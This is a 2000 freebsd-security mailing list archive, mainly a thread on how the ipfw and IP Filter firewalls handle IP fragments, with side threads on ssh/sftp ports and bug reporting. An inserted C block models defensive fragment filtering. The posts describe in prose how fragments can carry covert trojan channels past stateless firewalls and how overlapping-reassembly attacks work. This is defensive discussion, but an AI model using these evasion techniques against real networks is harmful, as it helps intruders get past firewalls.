From owner-freebsd-security Sun Sep 3 1:44:58 2000
Date: Sun, 3 Sep 2000 01:44:53 -0700
From: "Crist J . Clark"
To: Dragos Ruiu
Cc: Bill Fumerola, Nicolas, freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
Message-ID: <20000903014453.H62475@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
In-Reply-To: <0009022351571F.20066@smp.kyx.net>

On Sat, Sep 02, 2000 at 11:47:29PM -0700, Dragos Ruiu wrote:
> On Sat, 02 Sep 2000, Bill Fumerola wrote:
> > On Sat, Sep 02, 2000 at 05:50:02PM -0700, Dragos Ruiu wrote:
> > > > > Is there a way to make ipfw to reassemble fragmented ip packets
> > > > > before passing them through the rules?
> > > >
> > > > No. The relevant bits are only in the first packet.
> > >
> > > It could be made to reassemble them,
> > > but it would incur a performance hit.
> >
> > What do you gain? Nothing that I can think that ipfw currently
> > tests for is in the non-initial fragment.
>
> Correct me if I'm wrong because I haven't looked at the ipfw source,
> but fragments don't get passed. There are some applications that
> like to send big packets (I have a video streaming system for instance
> that sends up to 64K UDP datagrams) that will always get fragmented.
> If I wanted to send such packets unmolested through ipfw it
> would have to "reassemble" them as it were so that once the first
> fragment got through the subsequent ones could follow too.
>
> Or am I missing something here in what you're trying to do?

To pass all fragments,

  # ipfw add pass ip from any to any frag

Or you can add specific protocols, source, destination, interface, etc.
If you do not add a rule like that, your fragments will generally fall
through to the last rule which should be a default deny.

Some points from ipfw(8) to remember,

     Fragmented packets which have a non-zero offset (i.e. not the first
     fragment) will never match a rule which has one or more port
     specifications. See the frag option for details on matching
     fragmented packets.

     frag    Match if the packet is a fragment and this is not the first
             fragment of the datagram. frag may not be used in
             conjunction with either tcpflags or TCP/UDP port
             specifications.

     There is one kind of packet that the firewall will always discard,
     that is an IP fragment with a fragment offset of one. This is a
     valid packet, but it only has one use, to try to circumvent
     firewalls.

     Incoming packet fragments diverted by divert or tee are reassembled
     before delivery to the socket.

Reassembling packets in general is only really needed for an
application-layer level firewall, which ipfw is not. But as that last
point alludes, that's kind of blurry once you NAT.

-- 
Crist J. Clark                           cjclark@alum.mit.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From: Dragos Ruiu
Organization: kyx.net
To: cjclark@alum.mit.edu, "Crist J . Clark"
Cc: Bill Fumerola, Nicolas, freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
Date: Sun, 3 Sep 2000 02:22:52 -0700
Message-Id: <0009030256211M.20066@smp.kyx.net>
In-Reply-To: <20000903014453.H62475@149.211.6.64.reflexcom.com>

On Sun, 03 Sep 2000, Crist J . Clark wrote:
> > Or am I missing something here in what you're trying to do?
>
> To pass all fragments,
>
>   # ipfw add pass ip from any to any frag

So I can enable fragmented communications like my UDP video monstergrams
through the firewall...ok. There are many reasons why fragments can
occur naturally too, like an MTU mismatch along a path, oddball phy
links, route changes, or flaps, etc...

But this means that to support these packets any fragmented packet can
get past your fw. So if I wanted to communicate with my trojan/backdoor
on the inside I would just send middle fragments to wake it up and they
go through your firewall like ghosts.... :-(

>      Incoming packet fragments diverted by divert or tee are reassembled
>      before delivery to the socket.

This is good to know... and handy quick and dirty way to get reassembly.
Thanks.

> Reassembling packets in general is only really needed for an
> application-layer level firewall, which ipfw is not. But as that last
> point alludes, that's kind of blurry once you NAT.

Actually IP level fragmentation is definitely not an application layer
thing. (I'm not talking about TCP fragmentation.) But I'm quibbling with
semantics...
My point is just that if you want to really do this appropriately you
should tag fragmented head packets that are allowed through and allow
subsequent fragments on that dest, port, and id #, and then you should
close that hole when you see the end fragment go by, or a timeout
occurs. The firewall should not let through any other fragments except
those belonging to the same datagram (dest, port, id) as allowed head
fragment packets. Otherwise, it is either very easy to set up covert
channels through your firewalls, or you have to break some spec
compliant applications.

It is not very difficult to code a packet filter so that it works
correctly even for fragments, but you incur a performance hit,
particularly for fragments (lookup), while maybe not much or a
negligible overhead for normal traffic. Ok.... now I'm curious, time to
look at the ipf and ipfw code....

Does the same behaviour apply to ipf?

cheers,
--dr

-- 
dursec.com ltd. / kyx.net - we're from the future
pgp fingerprint: 18C7 E37C 2F94 E251 F18E B7DC 2B71 A73E D2E8 A56D
pgp key: http://www.dursec.com/drkey.asc

Date: Sun, 3 Sep 2000 09:57:35 -0400 (EDT)
From: Robert Watson
To: Dragos Ruiu
Cc: cjclark@alum.mit.edu, "Crist J . Clark", Bill Fumerola, Nicolas, freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
In-Reply-To: <0009030256211M.20066@smp.kyx.net>

On Sun, 3 Sep 2000, Dragos Ruiu wrote:

> But this means that to support these packets any fragmented
> packet can get past your fw. So if I wanted to communicate
> with my trojan/backdoor on the inside I would just send middle
> fragments to wake it up and they go through your firewall
> like ghosts.... :-(

And I believe there are even tools available to do this, encapsulating
IP in fragments to allow a tunnel to be created.

> > Reassembling packets in general is only really needed for an
> > application-layer level firewall, which ipfw is not. But as that last
> > point alludes, that's kind of blurry once you NAT.
>
> Actually IP level fragmentation is definitely not an application
> layer thing. (I'm not talking about TCP fragmentation.) But I'm
> quibbling with semantics...

However, reassembly does fit more into the application-layer
environment, as for stateless IP-layer firewalls, there are few reasons
to perform reassembly.

> My point is just that if you want to really do this appropriately
> you should tag fragmented head packets that are allowed through
> and allow subsequent fragments on that dest, port, and id #,
> and then you should close that hole when you see the end
> fragment go by, or a timeout occurs. The firewall should
> not let through any other fragments except those belonging
> to same datagram(dest,port,id) as allowed head fragment
> packets. Otherwise, it is either very easy to set up covert
> channels through your firewalls, or you have to break some
> spec compliant applications.
My recollection was that fragments can be created that do not contain
all of the transport-layer headers. For example, although it should not
occur ``naturally,'' it is possible to fragment a packet immediately
after the IP header but before the TCP-level port information is
included. Similarly, later fragments may begin at arbitrary points in
the datagram, based on how the PMTU caused the fragmentation at various
points on the path. Therefore, incoming fragments may not have the port
information you refer to in this paragraph: the only information
available will be {IP source, destination, IP ID} plus some offset
information, although due to multi-path routing, it is entirely possible
to end up with overlapping fragments later in the packet. In fact, a
number of spiffy firewall traversal techniques take advantage of this.

ipfw does not currently drop packets with a first fragment smaller than
the minimum IP MTU, or later fragments that overlap the first minimum IP
MTU. It should do so to thwart a number of overlapping reassembly
attacks. The check for a fragment beginning at offset "1" is cute, but
in practice wouldn't stop an attacker writing their own tools.

> It is not very difficult to code a packet filter so that it works
> correctly even for fragments, but you incur a performance hit,
> particularly for fragments (lookup), while maybe not much or a
> negligible overhead for normal traffic. Ok.... now I'm curious,
> time to look at the ipf and ipfw code....

Introducing state on a high-speed firewall hurts. If it can be avoided,
you want to do that. If not.. well, you accept the consequences, but
remember that any storage of state is an opportunity for denial of
service, both due to the lookup performance hit, and the potential for
state exhaustion. Aggressive dropping of questionable fragments helps
thwart a number of attacks, and should be used.
Fundamentally, I think you'll find that blocking trojan horse
communication is impossible if you allow any communication through at
all. IP tunneling via DNS queries, SMTP mail service, fragments, and TCP
negotiation options have all been demonstrated; preventing information
leaking is effectively impossible, although you can lower the bandwidth.
Instead, concentrate on limiting the opportunities for placing trojans
within your infrastructure, and detecting when they do happen.

> Does the same behaviour apply to ipf?

Darren Reed will be able to best answer this question, and presumably
will do so.

Robert N M Watson             robert@fledge.watson.org
http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

Date: Sun, 3 Sep 2000 11:27:46 -0600 (MDT)
Message-Id: <200009031727.LAA03881@nomad.yogotech.com>
From: Nate Williams
To: Robert Watson
Cc: Dragos Ruiu, cjclark@alum.mit.edu, "Crist J . Clark", Bill Fumerola, Nicolas, freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
References: <0009030256211M.20066@smp.kyx.net>
Reply-To: nate@yogotech.com (Nate Williams)

> My recollection was that fragments can be created that do not contain all
> of the transport-layer headers. For example, although it should not
> occur ``naturally,'' it is possible to fragment a packet immediately
> after the IP header but before the TCP-level port information is
> included. Similarly, later fragments may begin at arbitrary points in
> the datagram, based on how the PMTU caused the fragmentation at various
> points on the path.

Actually, isn't the purpose of PMTU to avoid the need to fragment the
packet at intermediate routers? Since PMTU involves both endpoints of
the link, thus allowing the originator to determine *if* a packet of a
particular size can make it all the way from one end to the other w/out
fragmentation.

It seems that fragmentation is a real problem for stateless firewalls,
but is a real problem that should be considered, especially since our
existing IPFW is semi-stateful now. :)

Nate

Date: Sun, 3 Sep 2000 19:46:11 +0200
From: Mipam
To: Nate Williams
Cc: Robert Watson, Dragos Ruiu, cjclark@alum.mit.edu, "Crist J . Clark", Bill Fumerola, Nicolas, freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
Message-ID: <20000903194611.A10607@ibb0021.ibb.uu.nl>
Reply-To: mipam@ibb.net
In-Reply-To: <200009031727.LAA03881@nomad.yogotech.com>

> Actually, isn't the purpose of PMTU to avoid the need to fragment the
> packet at intermediate routers? Since PMTU involves both endpoints of
> the link, thus allowing the originator to determine *if* a packet of a
> particular size can make it all the way from one end to the other w/out
> fragmentation.
>

As far as I can tell, it is :)
Nice link for this:
http://www.cis.ohio-state.edu/rfc/rfc1191.txt
In other words, rfc 1191 has nice info about it.
I guess this is another good reason to allow icmp, especially type 3
code 4.

Now, I came to icmp again, a remark on the icmp discussion from latest
time. No need to explicitly specify to allow icmp type 0 on ipf. Icmp
state keeping will result in the answer coming through on the initial
icmp type 8. That is, I never experienced trouble doing it this way.
That doesn't mean that it's all right. Maybe there are circumstances in
which you wish to explicitly allow icmp type 0 to come in, in which case
I'd like to hear about it :)

Bye,

Mipam.
Date: Sun, 3 Sep 2000 12:20:10 -0700
From: "Crist J . Clark"
To: Dragos Ruiu
Cc: Bill Fumerola, Nicolas, freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
Message-ID: <20000903122010.K62475@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
In-Reply-To: <0009030256211M.20066@smp.kyx.net>

On Sun, Sep 03, 2000 at 02:22:52AM -0700, Dragos Ruiu wrote:
> On Sun, 03 Sep 2000, Crist J . Clark wrote:

[snip]

> Actually IP level fragmentation is definitely not an application
> layer thing. (I'm not talking about TCP fragmentation.) But I'm
> quibbling with semantics...

No, it occurs at the IP layer of course, but it typically is only of
interest when the firewall is actually examining the contents of the
packets, and that usually only happens in application layer firewalls.

> My point is just that if you want to really do this appropriately
> you should tag fragmented head packets that are allowed through
> and allow subsequent fragments on that dest, port, and id #,
> and then you should close that hole when you see the end
> fragment go by, or a timeout occurs. The firewall should
> not let through any other fragments except those belonging
> to same datagram(dest,port,id) as allowed head fragment
> packets. Otherwise, it is either very easy to set up covert
> channels through your firewalls, or you have to break some
> spec compliant applications.

Sounds easier than it is. There is no guarantee that fragments with the
transport layer information will be the first ones there for example.
And there is my personal favorite, you can fragment fragments.
It's really easy to DOS a firewall if you're not _really_ careful. Just
ask Checkpoint.

-- 
Crist J. Clark                           cjclark@alum.mit.edu
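As an added illustration (not code from ipfw, IP Filter, or anyone in this thread), the C model below implements the hole-tracking scheme Dragos proposes and the refusals Robert argues for: head fragments too short to carry the transport header are dropped, later fragments that land on the header region or on data the head already carried are dropped, the state table is bounded, and holes time out. The names, the three constants and the 10.0.0.x sample addresses are assumptions chosen for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of stateful fragment admission; not ipfw or ipf code.
 * The three constants are assumptions chosen for illustration. */
#define MAX_STATE      64   /* bounded table: when full, no new holes open */
#define FRAG_TIMEOUT   30   /* seconds an admitted head keeps its hole open */
#define MIN_HEAD_BYTES 20   /* bytes a head must carry to contain the ports */

enum verdict { DROP = 0, PASS = 1 };

struct frag {
    uint32_t src, dst;          /* IPv4 addresses, host order */
    uint8_t  proto;             /* IP protocol number */
    uint16_t id;                /* IP identification field */
    uint16_t offset, len;       /* offset in bytes (field * 8), payload bytes */
    int      more;              /* MF flag */
};

struct hole {                   /* one admitted head fragment */
    int      used;
    uint32_t src, dst;
    uint8_t  proto;
    uint16_t id, head_len;      /* head_len: bytes the head covered */
    uint32_t expires;           /* absolute second at which the hole closes */
};

static struct hole table[MAX_STATE];
void frag_table_reset(void) { memset(table, 0, sizeof table); }

static struct hole *hole_lookup(const struct frag *f, uint32_t now)
{
    for (int i = 0; i < MAX_STATE; i++) {
        struct hole *h = &table[i];
        if (!h->used) continue;
        if (now >= h->expires) { h->used = 0; continue; }   /* lazy timeout */
        if (h->src == f->src && h->dst == f->dst &&
            h->proto == f->proto && h->id == f->id)
            return h;
    }
    return NULL;
}

static int hole_open(const struct frag *f, uint32_t now)
{
    for (int i = 0; i < MAX_STATE; i++) {
        struct hole *h = &table[i];
        if (h->used && now < h->expires) continue;
        *h = (struct hole){1, f->src, f->dst, f->proto, f->id,
                           f->len, now + FRAG_TIMEOUT};
        return 1;
    }
    return 0;   /* table full: refuse rather than evict live holes */
}

/* head_allowed is what the ordinary port-aware rules decided for the
 * first fragment, the only one in which the ports are visible. */
enum verdict frag_filter(const struct frag *f, int head_allowed, uint32_t now)
{
    if (f->offset == 0) {
        if (!f->more)                   /* unfragmented datagram */
            return head_allowed ? PASS : DROP;
        if (f->len < MIN_HEAD_BYTES)    /* head too short to carry the ports */
            return DROP;
        if (!head_allowed)
            return DROP;
        return hole_open(f, now) ? PASS : DROP;
    }
    /* Non-first fragment: anything landing inside the transport header is
     * refused before any lookup (generalises ipfw's offset == 1 check). */
    if (f->offset < MIN_HEAD_BYTES)
        return DROP;
    struct hole *h = hole_lookup(f, now);
    if (h == NULL)                      /* no admitted head, or it came later */
        return DROP;
    if (f->offset < h->head_len)        /* overlaps data the head carried */
        return DROP;
    if (!f->more)                       /* last fragment: close the hole */
        h->used = 0;
    return PASS;
}

/* Build a constructed sample fragment (10.0.0.1 -> 10.0.0.2, UDP) and
 * filter it, so a scenario can be walked through call by call. */
int check(uint16_t id, uint16_t off, uint16_t len, int more, int allowed, uint32_t now)
{
    struct frag f = {0x0a000001, 0x0a000002, 17, id, off, len, more};
    return frag_filter(&f, allowed, now);
}

int main(void)
{
    int head  = check(4242, 0, 1400, 1, 1, 0);     /* admitted head opens a hole */
    int mid   = check(4242, 1400, 1400, 1, 1, 1);  /* follows through that hole */
    int ghost = check(9999, 1400, 1400, 1, 1, 1);  /* no head for this id: dropped */
    printf("head=%d mid=%d ghost=%d (1=pass, 0=drop)\n", head, mid, ghost);
    return 0;
}
```

A non-first fragment that arrives before its head is dropped rather than buffered, which is the trade-off Crist points at: holding it would add exactly the reassembly state the thread wants to avoid.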
From: Darren Reed
Message-Id: <200009032010.HAA15013@cairo.anu.edu.au>
Subject: Re: ipfw and fragments
To: rwatson@FreeBSD.ORG (Robert Watson)
Date: Mon, 4 Sep 2000 07:10:46 +1100 (Australia/NSW)
Cc: dr@kyx.net (Dragos Ruiu), cjclark@alum.mit.edu, cjclark@reflexnet.net (Crist J . Clark), billf@chimesnet.com (Bill Fumerola), list@rachinsky.de (Nicolas), freebsd-security@FreeBSD.ORG
In-Reply-To: from "Robert Watson" at Sep 03, 2000 09:57:35 AM

In some mail from Robert Watson, sie said:
[...]
> > Does the same behaviour apply to ipf?
>
> Darren Reed will be able to best answer this question, and presumably will
> do so.

Damn I'd been not reading this thread at all until your email, Robert :-)

What does IP Filter do with fragments ?

That a packet is a fragment is a filterable attribute. You can also
tell it to remember "state information" triggered by the fragment with
offset == 0. It never reassembles and doesn't hold them in a buffer
until they're all received either.

Darren

Message-ID: <39B2B33A.EC657BD3@earthlink.net>
Date: Sun, 03 Sep 2000 16:23:22 -0400
From: Jeff Evarts
Organization: Riventree
To: lidl@pix.net
Subject: What level of bug is worth reporting?

Hello,

This is really a question about what-level-of-bug-is-worth-reporting.
This is what I found:

IF ( Obscure-Service-X is turned on in Open/Free/Net-BSD ) [Haven't checked BSD/OS]
THEN
    Any local user can set the access time of any file to the current time
    Any local user can set the mode of any tty device to rw------, whether
    it's in use or not
ENDIF

Both of these seem like potential DOS problems to me, though I cannot
think of any way to exploit them to become root or anything, and the
code in question has worked the way it does for over 2 years.

Is a "problem" like this worth reporting, or does it just make you look
like a nitpicker?

-Jeff Evarts
--riventree@earthlink.net
---http://www.ecst.csuchico.edu/~amarth/

Date: Sun, 3 Sep 2000 20:32:25 +0000 (GMT)
From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
To: CrazZzy Slash
Cc: freebsd-security@FreeBSD.ORG
Subject: Ssh2, sftp port Numbers ???

Dear All,

Thanx to your help successfully installed ssh2. Now I am confused about
one thing. When I use ssh2 or sftp I see that they use the same port
number which is 22. Hum?, my question is:
How to distinguish between the two applications ssh2 and sftp?
Is there any way for me to assign sftp another port number, say 199?

I thank you in Advance

Ali Alaoui El Hassani

On Sun, 20 Aug 2000, CrazZzy Slash wrote:

> Hi,
>
> Install /usr/ports/security/ssh2.
>
>
> On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote:
> > Dear all,
> > I need to install
> > stlenet, sftp , shttp on a FreeBsd 3.3
> >
> > any Help?

Date: Sun, 3 Sep 2000 17:31:36 -0400
From: Bill Fumerola
To: Darren Reed
Cc: Robert Watson, Dragos Ruiu, cjclark@alum.mit.edu, "Crist J . Clark", Nicolas, freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
Message-ID: <20000903173136.S33771@jade.chc-chimes.com>
In-Reply-To: <200009032010.HAA15013@cairo.anu.edu.au>

On Mon, Sep 04, 2000 at 07:10:46AM +1100, Darren Reed wrote:

> It never reassembles and doesn't hold them in a buffer until they're
> all received either.

Which I still think is the proper behavior for both ipfw and ipfilter.

-- 
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org

Date: Sun, 3 Sep 2000 15:01:29 -0700
From: "Crist J . Clark"
To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
Cc: CrazZzy Slash, freebsd-security@FreeBSD.ORG
Subject: Re: Ssh2, sftp port Numbers ???
Message-ID: <20000903150129.M62475@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu

On Sun, Sep 03, 2000 at 08:32:25PM +0000, Ali Alaoui El Hassani wrote:
> Dear All,
> Thanx to your help successfully installed ssh2. Now I am confused about
> one thing. When I use ssh2 or sftp I see that they use the same port
> number which is 22. Hum?, my question is:
> How to distinguish between the two applications ssh2 and sftp?
> Is there any way for me to assign sftp another port number, say 199?

Both ssh2 and sftp are talking to the same daemon on the remote host.
That's why they connect to the same port. You can use other ports, but
why?

-- 
Crist J. Clark                           cjclark@alum.mit.edu

Date: Mon, 4 Sep 2000 00:59:15 +0300
From: Peter Pentchev
To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
Cc: CrazZzy Slash, freebsd-security@FreeBSD.ORG
Subject: Re: Ssh2, sftp port Numbers ???
Message-ID: <20000904005915.A61559@ringwraith.office1.bg>

On Sun, Sep 03, 2000 at 08:32:25PM +0000, Ali Alaoui El Hassani wrote:
> Dear All,
> Thanx to your help successfully installed ssh2. Now I am confused about
> one thing. When I use ssh2 or sftp I see that they use the same port
> number which is 22. Hum?, my question is:
> How to distinguish between the two applications ssh2 and sftp?
> Is there any way for me to assign sftp another port number, say 199?

Not unless you choose to run another instance of sshd listening on
port 199.

sftp is not a separate service per se, it works by establishing an SSH
connection (it requires that you login via SSH, or some kind of
rhosts/shosts, but definitely some kind of SSH authentication), and then
executing a server program on the side you are connecting to. Actually,
sftp *executes* the ssh client at the client side (which is why it has
an option to pass ssh options, like an identity file and such), so it
pretty much expects the client to have a server to connect to.

In theory, the SSH server could be recompiled so that it specifically
does *not* allow execution of the sftp server, and placed to listen on
port 22, and then a not-hacked version placed to listen on port 199,
possibly made so it can *only* execute sftp.. but I, personally, do not
really think it is worth the trouble.

G'luck,
Peter

-- 
This sentence contains exactly threee erors.
Date: Sun, 3 Sep 2000 22:08:49 +0000 (GMT)
From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
To: Peter Pentchev
Cc: CrazZzy Slash, freebsd-security@FreeBSD.ORG
Subject: Re: Ssh2, sftp port Numbers continue.....
In-Reply-To: <20000904005915.A61559@ringwraith.office1.bg>

Dear All,

My wonder is that since sftp and ssh use the same port number 22.

So how do they get dispatched at the level of tcp to the receiving
applications sftp and ssh of remote host ?

Ali.

On Mon, 4 Sep 2000, Peter Pentchev wrote:

> On Sun, Sep 03, 2000 at 08:32:25PM +0000, Ali Alaoui El Hassani wrote:
> > Dear All,
> > Thanx to your help successfully installed ssh2. Now I am confused about
> > one thing. When I use ssh2 or sftp I see that they use the same port
> > number which is 22. Hum?, my question is:
> > How to distinguish between the two applications ssh2 and sftp?
> > Is there any way for me to assign sftp another port number, say 199?
>
> Not unless you choose to run another instance of sshd listening on
> port 199.
>
> sftp is not a separate service per se, it works by establishing an SSH
> connection (it requires that you login via SSH, or some kind of rhosts/shosts,
> but definitely some kind of SSH authentication), and then executing a server
> program on the side you are connecting to. Actually, sftp *executes*
> the ssh client at the client side (which is why it has an option to pass
> ssh options, like an identity file and such), so it pretty much expects
> the client to have a server to connect to.
>
> In theory, the SSH server could be recompiled so that it specifically does
> *not* allow execution of the sftp server, and placed to listen on port 22,
> and then a not-hacked version placed to listen on port 199, possibly made
> so it can *only* execute sftp.. but I, personally, do not really think
> it is worth the trouble.
> > G'luck, > Peter > > -- > This sentence contains exactly threee erors. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 15:27: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 8FCA437B43C for ; Sun, 3 Sep 2000 15:27:03 -0700 (PDT) Received: (qmail 61762 invoked by uid 1001); 3 Sep 2000 22:24:07 -0000 Date: Mon, 4 Sep 2000 01:24:07 +0300 
From: Peter Pentchev
To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
Cc: CrazZzy Slash , freebsd-security@FreeBSD.ORG
Subject: Re: Ssh2, sftp port Numbers continue.....
Message-ID: <20000904012407.B61559@ringwraith.office1.bg>
References: <20000904005915.A61559@ringwraith.office1.bg>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from 961BE653994@stud.alakhawayn.ma on Sun, Sep 03, 2000 at 10:08:49PM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, Sep 03, 2000 at 10:08:49PM +0000, Ali Alaoui El Hassani wrote:
> Dear All,
>
> My wonder is that since sftp and ssh use the same port number 22.
>
> So how do they get dispatched at the level of TCP to the receiving
> applications sftp and ssh of the remote host?
>

Please read again what I wrote before :)

I wrote that sftp executes the SSH client - thereby the SSH server is executed on the remote side. sftp passes a command to execute to the client, which passes it to the server - and the remote sshd executes the sftp server.

- you invoke sftp hostname;
- sftp invokes ssh hostname /path/to/sftpserv;
- ssh establishes an SSH connection to hostname;
- sshd at hostname is executed;
- ssh (local) asks you for a password;
- sshd (remote) verifies and acknowledges the password;
- ssh (local) asks sshd (remote) to execute /path/to/sftpserv;
- sshd (remote) executes sftpserv;
- sftp (local) talks to ssh (local), which relays to sshd (remote), which is actually already overlaid by sftpserv (remote);
- you have an sftp (local) to sftpserv (remote) connection.

As you can see, this requires an sshd on the remote side to verify your password/rhosts/shosts/identity-file, and allow you to execute the sftpserv on the remote side. There is no sftpserv service per se, it is just a program that sshd executes.

Maybe what you are missing is that you can use SSH to execute just one program on the remote side, rsh style, without actually allocating a virtual terminal, starting a shell, running startup scripts and such. Just try:

    ssh someuser@somehostname /usr/bin/w

ssh connects to sshd, sshd executes /usr/bin/w, w shows some output and the connection is closed.

This is exactly the case with sftpserv, only sftpserv does not 'show some output' and die, rather it communicates with the sftp client at your side to let you transfer files any way you want to.

Sorry for the long explanation, hope it helped a bit :)

G'luck,
Peter

--
This sentence every third, but it still comprehensible.

From owner-freebsd-security Sun Sep 3 15:42:05 2000
Delivered-To: freebsd-security@freebsd.org
Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 1940237B424 for ; Sun, 3 Sep 2000 15:41:59 -0700 (PDT)
Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id WAA05657; Sun, 3 Sep 2000 22:37:03 GMT
Date: Sun, 3 Sep 2000 22:37:03 +0000 (GMT)
From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
To: Peter Pentchev
Cc: CrazZzy Slash , freebsd-security@FreeBSD.ORG
Subject: Re: Ssh2, sftp port Numbers continue.....
In-Reply-To: <20000904012407.B61559@ringwraith.office1.bg>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Dear Sir,

I thank you for this long and valuable explanation. It helped me a lot. Thank you very much.

Ali.

On Mon, 4 Sep 2000, Peter Pentchev wrote:

> On Sun, Sep 03, 2000 at 10:08:49PM +0000, Ali Alaoui El Hassani wrote:
> > Dear All,
> >
> > My wonder is that since sftp and ssh use the same port number 22.
> >
> > So how do they get dispatched at the level of TCP to the receiving
> > applications sftp and ssh of the remote host?
> >
>
> Please read again what I wrote before :)
>
> I wrote that sftp executes the SSH client - thereby the SSH server
> is executed on the remote side. sftp passes a command to execute
> to the client, which passes it to the server - and the remote sshd
> executes the sftp server.
>
> - you invoke sftp hostname;
> - sftp invokes ssh hostname /path/to/sftpserv;
> - ssh establishes an SSH connection to hostname;
> - sshd at hostname is executed;
> - ssh (local) asks you for a password;
> - sshd (remote) verifies and acknowledges the password;
> - ssh (local) asks sshd (remote) to execute /path/to/sftpserv;
> - sshd (remote) executes sftpserv;
> - sftp (local) talks to ssh (local), which relays to sshd (remote),
> which is actually already overlaid by sftpserv (remote);
> - you have an sftp (local) to sftpserv (remote) connection.
>
> As you can see, this requires an sshd on the remote side to verify
> your password/rhosts/shosts/identity-file, and allow you to execute
> the sftpserv on the remote side. There is no sftpserv service per se,
> it is just a program that sshd executes.
>
> Maybe what you are missing is that you can use SSH to execute just one
> program on the remote side, rsh style, without actually allocating
> a virtual terminal, starting a shell, running startup scripts and such.
> Just try:
>
> ssh someuser@somehostname /usr/bin/w
>
> ssh connects to sshd, sshd executes /usr/bin/w, w shows some output
> and the connection is closed.
>
> This is exactly the case with sftpserv, only sftpserv does not 'show some
> output' and die, rather it communicates with the sftp client at your side
> to let you transfer files any way you want to.
>
> Sorry for the long explanation, hope it helped a bit :)
>
> G'luck,
> Peter
>
> --
> This sentence every third, but it still comprehensible.

From owner-freebsd-security Sun Sep 3 16:18:05 2000
Delivered-To: freebsd-security@freebsd.org
Received: from alcanet.com.au (mail.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with SMTP id 9F35437B424 for ; Sun, 3 Sep 2000 16:18:00 -0700 (PDT)
Received: by border.alcanet.com.au id <115345>; Mon, 4 Sep 2000 10:17:27 +1000
Content-return: prohibited
Date: Mon, 04 Sep 2000 10:17:41 +1100
From: Peter Jeremy
Subject: Re: ipfw and fragments
In-reply-to: <200009031727.LAA03881@nomad.yogotech.com>; from nate@yogotech.com on Sun, Sep 03, 2000 at 11:27:46AM -0600
To: Nate Williams
Cc: freebsd-security@FreeBSD.ORG
Mail-followup-to: Nate Williams , freebsd-security@FreeBSD.ORG
Message-Id: <00Sep4.101727est.115345@border.alcanet.com.au>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-disposition: inline
User-Agent: Mutt/1.2.4i
References: <0009030256211M.20066@smp.kyx.net> <200009031727.LAA03881@nomad.yogotech.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 2000-Sep-03 11:27:46 -0600, Nate Williams wrote:
> Actually, isn't the purpose of PMTU to avoid the need to fragment the
> packet at intermediate routers?

Yes. But I have also used a RAS that just clears the DF bit and fragments the packet anyway. The RAS provider seems unable to understand that this is a problem.

Peter

From owner-freebsd-security Sun Sep 3 17:51:33 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 5466337B422 for ; Sun, 3 Sep 2000 17:51:28 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id UAA75803; Sun, 3 Sep 2000 20:51:08 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Sun, 3 Sep 2000 20:51:08 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: Nate Williams
Cc: Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Bill Fumerola , Nicolas , freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
In-Reply-To: <200009031727.LAA03881@nomad.yogotech.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 3 Sep 2000, Nate Williams wrote:

> > My recollection was that fragments can be created that do not contain all
> > of the transport-layer headers. For example, although it should not
> > occur, ``naturally,'' it is possible to fragment a packet immediately
> > after the IP header but before the TCP-level port information is included.
> > Similarly, later fragments may begin at arbitrary points in the datagram,
